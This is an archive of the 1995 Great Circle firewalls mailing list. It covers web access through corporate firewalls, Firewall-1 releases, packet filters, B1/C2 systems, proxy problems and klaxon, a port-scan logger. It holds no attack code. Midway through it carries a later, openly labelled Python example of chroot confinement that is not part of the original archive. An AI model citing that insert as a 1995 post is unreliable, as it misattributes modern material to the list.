I've already looked at the Firewall-1 package, and while it looks really impressive, I just thought I'd look around for a public domain one before (making my boss) spend $4G to get the full version. I've also looked at ip_fil2.7.3 and screend, but unless I'm missing something, they both only run on BSD-style kernels, and you need the source code at that.

Thank you and have a whatever kind of day you prefer. (c:

--
+----------------------------------+---------------------------------------+
| Francis Hartojo                  | Internet: Francis.Hartojo@asu.edu     |
| Engineering Computer Services    | Phone:    (602) 965-8248 (work)       |
| Arizona State University         |           (602) 820-6029 (home)       |
|            _______               |             _______                   |
|    \     .'--------------------------+------------------------------`.  /
+--> | A lot of time has been wasted arguing on what came first:      | <---+
/____| the egg or the chicken. It's obviously the rooster.            |____\
     `-----------------------------------------------------------'

From firewalls-owner Tue Aug 8 15:08:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA26260 for firewalls-outgoing; Tue, 8 Aug 1995 14:48:43 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA26217 for ; Tue, 8 Aug 1995 14:48:36 -0700
Received: from firewall.statoil.no(193.212.68.177) by miles via smap (V1.3) id sma026204; Tue Aug 8 14:47:50 1995
Received: (from mailrelay@localhost) by firewall.statoil.no (8.6.12/8.6.12) id XAA21941 for ; Tue, 8 Aug 1995 23:52:58 +0200
Received: (from internal network) by firewall.statoil.no with SMTP id AA021937; Tue Aug 8 23:52:33 1995
Received: from safir.und.st.statoil.no by swing.data.st.statoil.no with SMTP (5.61++/IDA-1.2.8) id AA17359; Tue, 20 Jun 95 07:08:22 +0200
Received: from kvarts.st.statoil.no by safir.und.st.statoil.no (4.1/SMI-4.1) id AA16302; Tue, 20 Jun 95 06:43:01 +0200
Received: by kvarts.st.statoil.no (4.1/SMI-4.1) id AA13078; Tue, 20 Jun 95 07:05:41 +0200
Date: Tue, 20 Jun 95 07:05:41
  +0200
From: seen@statoil.no (S-E Engbraaten)
Message-Id: <9506200505.AA13078@kvarts.st.statoil.no>
To: Firewalls@GreatCircle.COM
Subject: WWW through firewalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello!

My company at the moment provides 4 Internet services through our firewall: ftp, telnet, email and nntp (news). We believe we have a sensible and protected setup.

At the same time users are screaming for WWW access. They have seen the friendly interface, and have seen useful information. And other companies are making information that my company uses available through WWW.

The company basically puts up these requirements on the Internet access:

- Nobody from the Internet - i.e. outside the firewall - should be able to initiate any kind of action on the inside machines.

- When people from the company initiate actions through the firewall, there should be no chance of unwanted actions happening on the inside machines. I.e. if the user clicks to see a pretty picture, nothing but the generation of that picture should happen. No unwanted side effects, basically.

So - the bottom line is: If it isn't secure, it isn't worth it.

My fundamental question is how to implement WWW access for the users and still maintain these requirements.

I can see several solutions, but I'm not sure yet how all of them match the basic requirements:

- Don't give users access to WWW.
- Put up standalone machines at strategic places.
- Put up some sort of secured WWW access through specific software on the users' machines.
- Put up some sort of secured WWW access on the firewall only.
- Put up a standard WWW access mechanism altogether.

We are not planning on setting up WWW pages, we just want our users - potentially well over 5000 - to look at what's out there.
Regards,
Stein-Erik

---------------------------------------------
Stein-Erik Engbråten, Statoil, Norway
mail:  Statoil SDATA BAS, Box 300, N-4001 Stavanger, NORWAY
email: seen@statoil.no
---------------------------------------------

From firewalls-owner Tue Aug 8 15:31:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA27107 for firewalls-outgoing; Tue, 8 Aug 1995 15:04:52 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA27099 for ; Tue, 8 Aug 1995 15:04:50 -0700
Received: from utrecht.knoware.nl(193.78.120.3) by miles via smap (V1.3) id sma027088; Tue Aug 8 15:04:06 1995
Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id AAA17048; Wed, 9 Aug 1995 00:02:39 +0200
Date: Wed, 9 Aug 1995 00:02:39 +0200
Message-Id: <199508082202.AAA17048@utrecht.knoware.nl>
X-Sender: njb@pop.knoware.nl
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Morgan Stair
From: njb@knoware.nl (Niels Bjergstrom)
Subject: Re: Phone numbers
Cc: firewalls@greatcircle.com
X-Mailer:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Does anyone know the phone numbers for these router companies.

Try to look at Brent's lists of references at URL: http://www.greatcircle.com

He has a very good reference list containing all kinds of info about commercial fw products.

Rgds,
Niels

------------------------------------------------------------------------
-- Niels J Bjergstrom, Ph.D., m/ISACA         Tel. +31 70 362 2269    --
-- Computer Security Engineers, Ltd.          Fax.
+31 70 365 2286    --
-- Postbus 85 502, NL-2508 CE Den Haag        London: +44 181 519 8011 --
-- Netherlands                                Email: njb@csehost.knoware.nl --
-- PGP Public key available on request - please use when mailing vira --
------------------------------------------------------------------------

From firewalls-owner Tue Aug 8 16:34:13 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01164 for firewalls-outgoing; Tue, 8 Aug 1995 16:27:36 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01130 for ; Tue, 8 Aug 1995 16:27:30 -0700
Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma000931; Tue Aug 8 16:26:20 1995
Received: from vodka.sse.att.com by ig1.att.att.com id AA10124; Tue, 8 Aug 95 18:41:22 EDT
Message-Id: <9508082241.AA10124@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Multilevel Security is good for firewalls
To: kaplan@bpa.arizona.edu (Ray Kaplan)
Date: Tue, 8 Aug 1995 18:43:03 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Ray Kaplan" at Aug 3, 95 08:25:54 am
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ray and others,

C2 is great for firewalls and B1 is better (see below).

I'm enjoying this discussion a lot. I hear a lot of frustrations out there about Orange Book style security. Guess I'm naturally biased here because I work for an organization that provided the first B1 evaluated version of UNIX. I've been involved in three major fieldings of our product now, and have spent months at customer sites as the technical point of contact for our software. I have found that most of the "incompatibilities" with security software were really systems integration issues masquerading under the title of security issues. B1 doesn't have to hurt.
We run commercial-off-the-shelf (COTS) software on our B1 systems with only minor configuration changes, unless that software's function is to do something that is inherently non-secure. The security software often gets blamed because we're an easy target. If something works on some other system without security, and doesn't work here, it must be the security that is getting in the way, right? WRONG!! This argument usually breaks down because the assumption that the systems are otherwise identical is false. But even when that assumption holds, the conclusion doesn't always follow. Sometimes a secure operating system will exercise portions of the application that aren't otherwise traversed. In other words, sometimes a secure OS will expose underlying flaws in application software. Some of these are security related flaws, others are just flaws that we were (un)lucky enough to have found first. This happens all the time in systems integration.

I wrote earlier that C2 is great for firewalls. Well, B1 is better. It allows you to compartmentalize the services provided by the firewall and to protect the underlying operating system from attack. Also, by appropriately labeling data and binaries, the operating system can prevent itself from executing untrusted binaries or relying upon untrusted configuration data. So B1 is a great addition for protecting the firewall itself from attack.

How does that help you build a better firewall? It gives you a trusted host on which to build your firewall application/relay/circuit. A broken firewall is a terrible liability: there goes all of that virtual private network encryption! ..there goes all of your company's data! ..what a nice place to sit and watch whatever your company accesses over the net!

I've read a lot of complaints about how the evaluation process takes too long to be useful when product cycles are so short. I've been too busy to post to every reply that slams the Orange Book criteria.
But remember, I'm not saying that C2 or B1 is the right thing for every computer in the corporation; however, firewalls are by definition choke points where security policies are enforced. We should use every means available to ensure that our firewall implementations are correct. We're talking about relatively few systems that provide the locks and bars protecting our enterprise data.

Use a B1 system to encapsulate the OS from the firewall, use the C2 auditing to detect intrusion. All of that builds on existing mature technology. Test the firewall with the latest from the field of Software Test and Reliability, use an evaluation type process to assure that it works securely.

Software testing can answer the question, "How reliably does my firewall perform?" But it cannot answer the question "How secure is my firewall?" The first question can be answered by comparing the behaviour of the firewall to a specification, and then plotting failures vs execution hours. There are models for predicting the likelihood of additional failures (Musa "Software Reliability" is a good one). But the second question is more difficult. If I had an implementation of every known security flaw/attack with which to bombard the firewall, I could determine that it covers every known attack, but without a formal model, I have no proof that no other attacks exist, and no idea about how many such attacks exist or how soon they will be uncovered. And while I can easily generate test cases for the first question, how do I generate test cases for unknown attack methods?

What I'm driving at here is that a security model can prevent attacks without understanding their underlying mechanism. Pagett writes about a virus protection scheme that he invented that knows nothing in particular about a given virus. That's possible because the virus has to do something dirty to your system, and he's looking for dirt.
[Hope that's an OK description--haven't looked at your code]

What we really need are secure protocols and services with which to communicate. Firewalls can implement a policy on top of that to determine which entities can communicate with which other entities and in what ways. Even if the firewall functions perfectly, you may have security problems because you perfectly pass some insecure protocol through the firewall.

-------------------------------------------------------------------
Mark Riggins                    I've seen the light at the
Secure Systems Engineering      end of the tunnel--it's a train.
AT&T Bell Labs

From firewalls-owner Tue Aug 8 17:04:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02417 for firewalls-outgoing; Tue, 8 Aug 1995 16:40:54 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02124 for ; Tue, 8 Aug 1995 16:40:12 -0700
Received: from explorer.csc.com(20.1.10.27) by miles via smap (V1.3) id sma001900; Tue Aug 8 16:38:57 1995
Received: by csc.com (Smail3.1.29.1 #1) id m0sfyDR-000iDLC; Tue, 8 Aug 95 19:37 EDT
Message-Id:
Date: Tue, 8 Aug 95 19:37 EDT
From: hdunn1@csc.com (Patrick Dunn)
To: Firewalls@GreatCircle.COM
Subject: re: WWW through firewalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[ Disengage Cloaking ]

You write:

> The company basically puts up these requirements on the Internet
> access:
>
> - Nobody from the Internet - ie outside the firewall - should
>   be able to initiate any kind of action on the inside machines.
>
> - When people from the company initiates actions through the
>   firewall, there should be no chance of unwanted actions
>   happening on the inside machines. Ie if the user clicks to see
>   a pretty picture, nothing but the generation of that picture
>
> So - the bottom line is: If it isn't secure, it isn't worth it.
>
> My fundamental question is how to implement WWW access to the
> users and still maintain these requirements.
> --------------------------------------------------------------------->

I have a customer presented with the same problem.

First, accept the fact that, regardless of their intentions (or your desire that it be otherwise), your users will be downloading data via their browsers. Whether it be HTML text, PostScript, PDF, GIF or other forms of data, it gets loaded onto the client machine. Can you say "Danger, Will Robinson!!!"

Next, resigning yourself to that fact, figure out how to "contain" the (potentially malicious) data/programs. I cannot speak (write) to other architectures, but, on UNIX-flavored machines you can "encapsulate" your application by using the chroot(1) program (or a chdir[2]/fchdir[2] system call followed by a chroot[2]/fchroot[2] system call) to a directory subtree dedicated to that purpose. By doing this, you ensure that data (including binaries) downloaded from the net will not have access to anything on your file system "above" the specified "root" directory.

The downside to this is that you will have to place your "viewer" applications and other useful programs in the same quarantine area such that it "looks" to them like the actual root file system. It may take a few iterations to identify all of the programs/data that need to be MOVED (we don't want any accidents) to the encapsulated subtree used for the web-related applications.

This topic has been covered enough that I won't waste any more (precious;-) bandwidth going into detail.

-----------------------------------------
Pat Dunn, Sr. Computer Scientist
Computer Sciences Corp.
Invoke standard disclaimer cr..
-----------------------------------------

[ Engage Cloaking ]

From firewalls-owner Tue Aug 8 17:35:53 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA04026 for firewalls-outgoing; Tue, 8 Aug 1995 17:17:10 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA04002 for ; Tue, 8 Aug 1995 17:17:06 -0700
Message-Id: <199508090017.RAA04002@miles.greatcircle.com>
Received: from ibmmail.com(199.171.26.3) by miles via smap (V1.3) id sma003996; Tue Aug 8 17:16:27 1995
Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 1122; Tue, 08 Aug 95 20:14:51 EDT
Date: Tue, 08 Aug 1995 20:18:14 EDT
From: "George Janczuk JZKGEQ - AMPLN1"
To: firewalls@greatcircle.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Subject: Security
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

===========================================================================

Our audit division is interested in gaining access to security based resources (i.e. mailing lists). I will be recommending this list (firewalls), best-of-security and risks.

I also seem to remember that another SECURITY based list does exist and has been mentioned here before - but I have not been able to find it. Does anyone know of this list? (It may possibly have been a newsgroup.)

What would other people recommend as an "online" reading list for audit personnel?

Regards,
George Janczuk (auampdrv@ibmmail.com)
AMP Society.
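A worked illustration of the chroot encapsulation Pat Dunn recommends in his reply on "WWW through firewalls" above, added here and not written by Mr. Dunn or anyone on the list: the order of the calls (chdir, then chroot, then re-anchor at the new root), the checks on the jail directory itself, and the privilege drop that keeps a root process from simply walking out of the jail again, which is an addition of this example rather than something his message states. The jail path, the uid/gid and the viewer names are all hypothetical; entering the jail needs root, while the checks around it run as any user.

```python
"""Confining a WWW viewer in a chroot jail (added example; hypothetical paths/ids)."""
import os
import stat
import tempfile
from typing import List, Optional

# Hypothetical jail layout: viewers and their libraries are MOVED under JAIL so
# that they resolve as /bin/xv, /lib/... once chroot() makes JAIL the new root.
JAIL = "/var/jail/www"                   # hypothetical
JAIL_UID, JAIL_GID = 60001, 60001        # hypothetical unprivileged ids
VIEWERS = ["bin/xv", "bin/ghostview"]    # hypothetical viewer binaries in the jail


def validate_jail_root(root: str) -> Optional[str]:
    """Return None if root is a usable jail directory, otherwise why it is not."""
    if not os.path.isabs(root):
        return "jail root must be an absolute path"
    if os.path.normpath(root) == "/":
        return "jail root must not be the real root"
    try:
        st = os.lstat(root)
    except FileNotFoundError:
        return "jail root does not exist"
    if stat.S_ISLNK(st.st_mode):
        return "jail root must not be a symlink"
    if not stat.S_ISDIR(st.st_mode):
        return "jail root is not a directory"
    if st.st_mode & stat.S_IWOTH:
        # anyone could plant a file at the jail's "/" (e.g. a fake /etc/passwd)
        return "jail root is world-writable"
    return None


def missing_viewers(root: str, viewers: List[str]) -> List[str]:
    """Which viewers have not yet been moved under the jail root."""
    return [v for v in viewers if not os.path.isfile(os.path.join(root, v))]


def enter_jail(root: str, uid: int, gid: int) -> None:
    """chdir + chroot + drop privileges, in that order.  Requires root to call."""
    problem = validate_jail_root(root)
    if problem:
        raise RuntimeError(problem)
    os.chdir(root)      # chdir(2) first, so the working directory is inside the jail
    os.chroot(root)     # chroot(2): the jail directory becomes "/"
    os.chdir("/")       # re-anchor the cwd at the new root
    os.setgroups([])    # no supplementary groups inherited from the parent
    os.setgid(gid)
    os.setuid(uid)      # give up root: a root process inside a chroot can leave it
    if os.getuid() == 0 or os.geteuid() == 0:
        raise RuntimeError("still root after setuid; refusing to continue")


def run_confined(root: str, uid: int, gid: int, argv: List[str]) -> None:
    """Enter the jail, then exec the viewer (argv[0] is a path under the NEW root)."""
    enter_jail(root, uid, gid)
    os.execv(argv[0], argv)


def make_scratch_dir(mode: int) -> str:
    """Create a throwaway directory with the given mode, to exercise the checks."""
    path = tempfile.mkdtemp()
    os.chmod(path, mode)
    return path


def place_stub_viewer(root: str, rel: str) -> None:
    """Create an empty placeholder file at root/rel (stands in for a moved viewer)."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    open(full, "wb").close()


if __name__ == "__main__":
    print("jail check:", validate_jail_root(JAIL))
    print("still to move:", missing_viewers(JAIL, VIEWERS))
    # run_confined(JAIL, JAIL_UID, JAIL_GID, ["/bin/xv", "/tmp/picture.gif"])  # as root
```

The point of `missing_viewers` is Mr. Dunn's iteration step: run it after each move until it comes back empty, then the viewer and everything it opens resolve inside the jail and nothing "above" the jail root is reachable from the downloaded data.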
From firewalls-owner Tue Aug 8 18:00:10 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA05118 for firewalls-outgoing; Tue, 8 Aug 1995 17:32:41 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA05070 for ; Tue, 8 Aug 1995 17:32:34 -0700
Received: from mercury.sun.com(192.9.25.1) by miles via smap (V1.3) id sma005058; Tue Aug 8 17:32:16 1995
Received: from Corp.Sun.COM by mercury.Sun.COM (Sun.COM) id RAA26473; Tue, 8 Aug 1995 17:31:05 -0700
Received: from rainbow.Corp.Sun.COM (rainbow-bb.Corp.Sun.COM) by Corp.Sun.COM (5.x/SMI-5.3) id AA10252; Tue, 8 Aug 1995 17:29:13 -0700
Received: from althea.Corp.Sun.COM by rainbow.Corp.Sun.COM (5.x/SMI-SVR4) id AA14418; Tue, 8 Aug 1995 17:29:11 -0700
Received: by althea.Corp.Sun.COM (5.x/SMI-SVR4) id AA00786; Tue, 8 Aug 1995 17:29:35 -0700
Date: Tue, 8 Aug 1995 17:29:35 -0700
From: Jerald.Josephs@Corp.Sun.COM (Jerald Josephs)
Message-Id: <9508090029.AA00786@althea.Corp.Sun.COM>
To: firewalls@greatcircle.com
Subject: Re: Firewall-1
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Version 1.2.1 of Firewall-1 will be officially released from SunSoft (cross my fingers) on Aug 23rd. It is my understanding that Checkpoint has not released a 1.2.1, but a 1.2. They are very similar, with the exception of some extra bug fixes in 1.2.1.

I would be cautious to bite the vendor for providing 1.0.7c 60 days ago, when, in fact, that was where it was at.

 /\        Jerald E.
Josephs \\ \ Technical Support Engineer - Networks \ \\ / SunService - North American Solution Center / \/ / / / / \//\ Phone/VM: 415-336-9558 \//\ / / FAX: 415-960-0572 / / /\ / E-mail: jerald.josephs@Corp.Sun.COM / \\ \ \ \\ \/ You'll never be without if you look within - unknown (possibly me, but I can't believe I'm the first to say it) >From firewalls-owner@GreatCircle.COM Mon Aug 7 12:47 PDT 1995 >From: strata@virtual.net >Date: Mon, 7 Aug 95 11:25:19 PDT >To: firewalls@greatcircle.com, support@checkpoint.com >Subject: Firewall-1 > > >I would like to thank the folks who pointed out that Firewall-1 is currently >at 1.2.1, I will be looking at a current copy soon. I am investigating why a >certain SF Bay reseller handed me 1.0.7c as "the latest copy" less than 60 >days ago, and will put them in touch with support@checkpoint.com. > >I apologize to the folks at Checkpoint for not talking to them first, >generally I trust my resellers to have economic incentive to give me >current products. > >Cheers, >_Strata > >PS- and yes, I know that the situation I was trying to set up can be >IP spoofed, I was trying to test a subset of what I wanted to do >rather than a sole component of a production firewall handling of FTP. >But thanks also to the folks who pointed that out. > > >************************************************************************* >PGP-- Phil Gets Prosecuted (Persecuted?) Support the Zimmerman Legal >Legal Defense Fund ==> Email: zldf@clark.net http://www.netresponse.com/zldf >************************************************************************* > INTERNET > Installations, Training, Publishing, Security >M. 
Strata Rose 408-733-UNIX (8649) strata@virtual.net >************************************************************************* > From firewalls-owner Tue Aug 8 21:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12806 for firewalls-outgoing; Tue, 8 Aug 1995 21:17:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12798 for ; Tue, 8 Aug 1995 21:17:32 -0700 Received: from ccvcom.auckland.ac.nz(130.216.1.2) by miles via smap (V1.3) id sma012792; Tue Aug 8 21:16:54 1995 Received: from ccu1.auckland.ac.nz by ccvcom.auckland.ac.nz (PMDF V4.3-7 #2864) id <01HTVIV82XXS8XE4OY@ccvcom.auckland.ac.nz>; Wed, 9 Aug 1995 16:13:25 GMT+1300 Received: (from russell@localhost) by ccu1.auckland.ac.nz (8.6.12/8.6.12) id QAA10587 for Firewalls@GreatCircle.COM; Wed, 9 Aug 1995 16:13:16 +1200 Date: Wed, 09 Aug 1995 16:13:15 +1200 (NZT) From: Russell Fulton Subject: push animations and the Cern proxy server. To: Firewalls@GreatCircle.COM (firewalls list) Message-id: <199508090413.QAA10587@ccu1.auckland.ac.nz> MIME-version: 1.0 X-Mailer: ELM [version 2.4 PL23] Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7bit Content-length: 1523 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have recently become aware of a problem with the Cern proxy server with caching enabled when accessing so called push animations. Push animations are multipart documents of essentially infinite length which do animation by repeatedly downloading an inline gif. Currently only netscape understands these. When a user accesses a url for one of these through a caching proxy the proxy keeps the connection open sucking the animation after the client has moved on or pushed stop. If the server has no timeout built into the animation script then the proxy will continue to download data until the process is killed. 
We have seen several cases where transfers from these urls have exceeded 1GB, a real disaster for us in NZ where we are paying well over $US 1 per MB for traffic on our international link!

We are looking at several different options for modifying the behaviour of the Cern proxy to cope with this problem. At the very least you need to keep an eye out for 'old' proxy processes and kill them off.

Cheers, Russell.

Russell Fulton, Computer Centre, University of Auckland, Private Bag 92019, Auckland, New Zealand.
'phone +64 9 373-7599 x 8955
fax +64 9 373-7425
email r.fulton@auckland.ac.nz
time gmt -12 (-13 oct - mar)
psi psi%5301970000073::r.fulton

From firewalls-owner Tue Aug 8 21:47:02 1995
Date: Tue, 8 Aug 95 23:50:54 -0400
Message-Id: <9508090350.AA05164@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Encryption solutions

Lundon rites:

>Due to the nature of the data the data must be encrypted as it passes
>over the Internet and strong authentication must be used when they connect.
>This is a commercial project and the data will cross
>International boundaries, for this reason I do not want
>to use encryption technology such as pgp as some of the
>countries will have problems with this.

So you want to encrypt but not offend. Sorry to say this cannot be done.

>Does anyone know of a hardware solution that can operate
>between one local machine and 5 or 6 remote machines?

In order of price:

1) Parallon Pathkey (206.641.8338)
2) IRE Encrypting modems (410.931.7500)
3) AT&T 3600
4) STU III (goes up fast from here)

Lockheed-Martin also has some products which modesty forbids my mentioning 8*). Apologies if I left someone out.

However any good encryption is going to offend those who wish to know what you are transmitting so would like to know why you feel that hardware would be less offensive than software/pgp ?

Warmly, Padgett

From firewalls-owner Tue Aug 8 22:00:04 1995
Date: Tue, 8 Aug 1995 21:28:09 -0700
Message-Id: <199508090428.VAA06746@uni.ins.com>
X-Sender: kadrich@uni.ins.com
To: Patrick Yeung
From: (Mark S. Kadrich)
Subject: Re: IP translation in Firewall-1
Cc: firewalls@greatcircle.com

NTMK. I have the manual and if it's possible it's an undocumented 'feature'.

msk

>Is there anybody who knows if the Firewall-1 (release 1.2.1) can do
>IP-translation.
>That means it can remap the internal networks' IPs to
>the Firewall's IP.
>
>Regards,
>Patrick Yeung

Mark S. Kadrich, Systems Engineer, International Network Services
"The Power of Operable Networks"
Voice @ 415-254-4225, Page @ 1-800-514-0355
e-mail @ kadrich@uni.ins.com
Information security is a process, not a solution.

From firewalls-owner Tue Aug 8 23:30:13 1995
Date: Wed, 9 Aug 1995 00:14:31 -0400
From: *Hobbit*
Message-Id: <199508090414.AAA07814@narq.avian.org>
To: firewalls@greatcircle.com
Subject: sleazewinder

[Referencing dan thomsen's msg from about a week ago, wherein he says...]

    As a result we get to learn what kind of attacks people are using
    against Unix systems. More importantly this shows that type
    enforcement is a useful tool in preventing system compromises.

Yes, and if I remember right, back when the challenge was issued and people finally figured out what was going on, it was pointed out that if SCTC was going to let the net test their product for them, they owed the results of said testing back to the net. I believe someone else from SCTC agreed with this, claiming that the megabytes of raw log would soon be boiled down into some sort of useful report.

    CONCERN 3. Is the Challenge a serious learning tool or a Marketing
    tactic? The answer is both.
The answer so far is "marketing tactic" from the standpoint of "out here on the net", unless you intend to do something about it. Where are your RESULTS?? Where is OUR benefit from all the free work that the community at large has given you?

_H*

From firewalls-owner Wed Aug 9 01:41:32 1995
Message-Id: <199508090815.BAA19118@miles.greatcircle.com>
From: Darren Reed
Subject: Re: Sparc2 as a 3-way packet filter?
To: detzel@medoc.medoc-ias.u-psud.fr (Vincent DETZEL)
Date: Wed, 9 Aug 1995 18:05:59 +1000 (EST)
Cc: dmurphy@cwa.com, firewalls@GreatCircle.COM
In-Reply-To: <199508080716.JAA07877@medoc.medoc-ias.u-psud.fr> from "Vincent DETZEL" at Aug 8, 95 09:16:46 am

In some mail from Vincent DETZEL, sie said:
>
> dmurphy wrote:
> >I've picked up the ipfilter package from Darren Reed, which looks to be
> >pretty much what I think I need, and the newest version of screend I was
> >able to find (dated April 1990). Any experiences with either of these two
> >packages, or pointers to other SW solutions, would be appreciated.
>
> Hi !
>
> I'm in the same situation and it's pretty difficult to make up my mind whether
> to use screend or ip-fil:
>
> - screend
> seems to be well-suited (functionality, documentation, portability, etc, ...)
> despite the fact it's quite old.
>
> - as for ip-fil (ftp:coombs.anu.edu.au/pub/net/kernel/ip-fil2.7.3.tar.gz)
> it appears to me that it begins to be widely chosen and as a matter of fact,
> many changes are applied to this package every week (last release dated : Aug 1).
>
> Does it mean that ip-fil is going to become much more efficient and functional than screend ?

Quite possibly :-)

As for changes, I try to do them as rarely as possible, but bugs are bugs and need to be addressed sooner rather than later. I've now got a mailing list for it and will announce it with the next update - I don't think firewalls is the right place for minor updates.

I should begin work on an Ultrix port soon (I don't expect to have to do much work) but Solaris2 has not been forgotten - I just need something with Solaris2 on it to work on it.

cheers, darren

From firewalls-owner Wed Aug 9 02:00:19 1995
From: F.Wetzels@amc.uva.nl
Date: Wed, 09 Aug 1995 10:18:07 +0200
Subject: Re: IP translation in Firewall-1
To: firewalls@greatcircle.com
Message-id: <9508090818.AA03426@amchelix.amc.uva.nl>

fpmw> NTMK. I have the manual and if it's possible it's an undocumented 'feature'.
fpmw> msk
fpmw> >Is there anybody who knows if the Firewall-1 (release 1.2.1) can do
fpmw> >IP-translation. That means it can remap the internal networks' IPs to
fpmw> >the Firewall's IP.

Or can it translate certain IP-addresses into IP-addresses from a pre-defined list? So, logical links are maintained between two `virtual' hosts?

frank

F.P.M. Wetzels, ADIV/CNS D01-319.1, wetzels@amc.uva.nl
meibergdreef 15, 1105 AZ Amsterdam-ZO
Voice +31 20 5662916, Fax +31 20 6973181

From firewalls-owner Wed Aug 9 04:30:15 1995
Date: Wed, 9 Aug 1995 07:23:43 -0400
Message-Id: <9508091123.AA06599@nexus.ptech.com>
To: (Mark S. Kadrich), Patrick Yeung
From: jim.brown@ptech.com (Jim Brown)
Subject: Re: IP translation in Firewall-1
Cc: firewalls@greatcircle.com

In the back of the FireWall-1 1.2 manual, it makes reference to IP address translation as a future feature on page 14-5.

jim

At 09:28 PM 8/8/95 -0700, Mark S. Kadrich wrote:
>NTMK. I have the manual and if it's possible it's an undocumented 'feature'.
>msk
>>Is there anybody who knows if the Firewall-1 (release 1.2.1) can do
>>IP-translation.
>>That means it can remap the internal networks' IPs to
>>the Firewall's IP.
>>
>>Regards,
>>Patrick Yeung
>
>Mark S. Kadrich, Systems Engineer, International Network Services
>"The Power of Operable Networks"
>Voice @ 415-254-4225, Page @ 1-800-514-0355
>e-mail @ kadrich@uni.ins.com
>Information security is a process, not a solution.

___jnb___

From firewalls-owner Wed Aug 9 05:01:49 1995
Date: Wed, 09 Aug 1995 14:21:13 +0300 (EET DST)
From: adamo@hpcl.cti.gr (Giorgos Adamopoulos)
Subject: Re: klaxon
To: firewalls@GreatCircle.Com
Reply-to: adamo@hpcl.cti.gr
Message-id: <9508091121.AA19819@hpcl.cti.gr>

Someone earlier mentioned that he downloaded `klaxon'. Where from? Is its source code free?
thanks in advance
--
Giorgos Adamopoulos (adamo@hpcl.cti.gr)

From firewalls-owner Wed Aug 9 06:30:18 1995
From: F.Wetzels@amc.uva.nl
Date: Wed, 09 Aug 1995 15:23:16 +0200
Subject: Re: IP translation in Firewall-1
To: firewalls@greatcircle.com
Message-id: <9508091323.AA05979@amchelix.amc.uva.nl>

fpmw> NTMK. I have the manual and if it's possible it's an undocumented 'feature'.
fpmw> msk
fpmw> >Is there anybody who knows if the Firewall-1 (release 1.2.1) can do
fpmw> >IP-translation. That means it can remap the internal networks' IPs to
fpmw> >the Firewall's IP.

Or can it translate certain IP-addresses into IP-addresses from a pre-defined list?

Frank

F.P.M. Wetzels, ADIV/CNS D01-319.1, wetzels@amc.uva.nl
meibergdreef 15, 1105 AZ Amsterdam-ZO
Voice +31 20 5662916, Fax +31 20 6973181

From firewalls-owner Wed Aug 9 07:00:44 1995
From: Doug Hughes
Date: Wed, 9 Aug 1995 08:32:04 -0500
Subject: Re: klaxon
To: adamo@hpcl.cti.gr
Cc: firewalls@greatcircle.com
In-Reply-To: <9508091121.AA19819@hpcl.cti.gr>

klaxon is something I wrote that I put in unused tcp and udp ports in inetd.conf. It catches port scanners like ISS, Satan, et al. by logging the results of the port and the machine it came from via syslog. It is a short C program that is very portable (based on the BSD rexec source code). It does not do RPC or ident.
It's available at: ftp.eng.auburn.edu:pub/doug/klaxon.c or http://www.eng.auburn.edu/users/doug/second.html

--
Doug Hughes, Engineering Network Services, System/Net Admin, Auburn University, doug@eng.auburn.edu
"Real programmers use cat > file.as"

From firewalls-owner Wed Aug 9 07:30:59 1995
From: "Newcomb, Kelly"
To: Firewalls-List
Subject: RE: Security
Date: Wed, 09 Aug 95 09:02:00 CDT
Message-ID: <3028C04D@msmail_gate.tgslc.org>

>>From George Janczuk (auampdrv@ibmmail.com)
>>
>>Our audit division is interested in gaining access to security based
>>resources (ie: mailing lists). I will be recommending this list
>>(firewalls), best-of-security and risks. I also seem to remember that
>>another SECURITY based list does exist and has been mentioned here before
>>- but I have not been able to find it. Does anyone know of this list? (it
>>may possibly have been a newsgroup). What would other people recommend as
>>an "online" reading list for audit personnel?
>>

Found the message you spoke of (I subscribe to it as well).
>From Slemo Warigon
>Would like to inform you all that we created an information security
